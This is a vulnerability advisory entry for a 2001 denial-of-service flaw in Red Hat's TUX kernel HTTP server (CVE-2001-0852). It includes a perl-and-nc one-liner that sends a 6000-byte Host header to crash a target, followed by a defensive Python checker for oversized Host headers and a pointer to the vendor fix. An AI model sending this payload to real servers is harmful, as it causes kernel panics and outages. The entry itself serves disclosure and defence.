Red Hat TUX HTTP Server Oversized Host Denial of Service Vulnerability


Vulnerability ID: 1106511
Vulnerability type: Boundary condition error
Published: 2001-11-05
Updated: 2005-08-17
CVE ID: CVE-2001-0852
CNNVD-ID: CNNVD-200112-024
Platform: Linux
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/21141
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-024
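|Vulnerability details
TUX HTTP server version 2.1.0-2 on Red Hat Linux contains a vulnerability. A remote attacker can cause a denial of service by sending an overlong Host: header.
|Exploit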
source: http://www.securityfocus.com/bid/3506/info

TUX is a kernel-based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content.

An error exists when the TUX daemon receives an oversized Host: header as part of an HTTP request. The request results in an assertion failure and eventually in a kernel panic. At this point a system reboot is required to regain normal functionality.

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>
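
A defensive check for the condition described above, as an added example that is not part of the original advisory: it inspects a raw HTTP request head before it reaches the server and flags an oversized, repeated or malformed Host: header. The function name and the 255-byte and 8192-byte limits are assumptions, not values taken from TUX or the Red Hat erratum.

```python
import re

# Assumption: 255 bytes covers a maximal DNS name (253) plus a short port suffix.
MAX_HOST_LEN = 255
# Assumption: cap on the whole request head, so other oversized headers are caught too.
MAX_HEAD_LEN = 8192
# host[:port] or [IPv6 literal][:port]
HOST_RE = re.compile(rb"[A-Za-z0-9.\-]+(:\d{1,5})?|\[[0-9A-Fa-f:.]+\](:\d{1,5})?")


def inspect_request_head(raw: bytes, max_host_len: int = MAX_HOST_LEN) -> list[str]:
    """Return a list of findings for one raw HTTP request (empty list = clean)."""
    findings = []
    # Separate head from body; accept bare LF as well as CRLF line endings,
    # since a client is not obliged to send well-formed CRLF.
    head = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)[0]
    if len(head) > MAX_HEAD_LEN:
        findings.append(f"request head is {len(head)} bytes (limit {MAX_HEAD_LEN})")
    hosts = []
    for line in re.split(rb"\r?\n", head)[1:]:  # element 0 is the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"host":
            hosts.append(value.strip())
    if len(hosts) > 1:
        findings.append(f"{len(hosts)} Host headers in one request")
    for value in hosts:
        if len(value) > max_host_len:
            findings.append(f"Host header is {len(value)} bytes (limit {max_host_len})")
        elif not HOST_RE.fullmatch(value):
            findings.append("Host header is not a valid host[:port]")
    return findings


# Constructed sample inputs (not captured traffic).
NORMAL = b"GET / HTTP/1.0\r\nAccept: */*\r\nHost: www.example.com\r\n\r\n"
OVERSIZED = b"GET / HTTP/1.0\nAccept: */*\nHost: " + b"A" * 6000 + b"\n"
DUPLICATE = b"GET / HTTP/1.0\r\nHost: a.example\r\nHost: b.example\r\n\r\n"

if __name__ == "__main__":
    for label, req in (("normal", NORMAL), ("oversized", OVERSIZED), ("duplicate", DUPLICATE)):
        print(label, inspect_request_head(req) or "clean")
```

A front-end proxy or filter that rejects requests with any finding keeps such input away from the kernel-mode server; the fix itself is the update in RHSA-2001:142.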
|References

Source: marc.theaimsgroup.com
Link: http://marc.theaimsgroup.com/?l=tux-list&m=100584714702328&w=2
Source: BUGTRAQ
Name: 20011105RHLinuxTuxHTTPDDoS
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=100498100112191&w=2
Source: REDHAT
Name: RHSA-2001:142
Link: http://www.redhat.com/support/errata/RHSA-2001-142.html
Source: XF
Name: tux-http-host-dos(7464)
Link: http://xforce.iss.net/static/7464.php
Source: BID
Name: 3506
Link: http://www.securityfocus.com/bid/3506
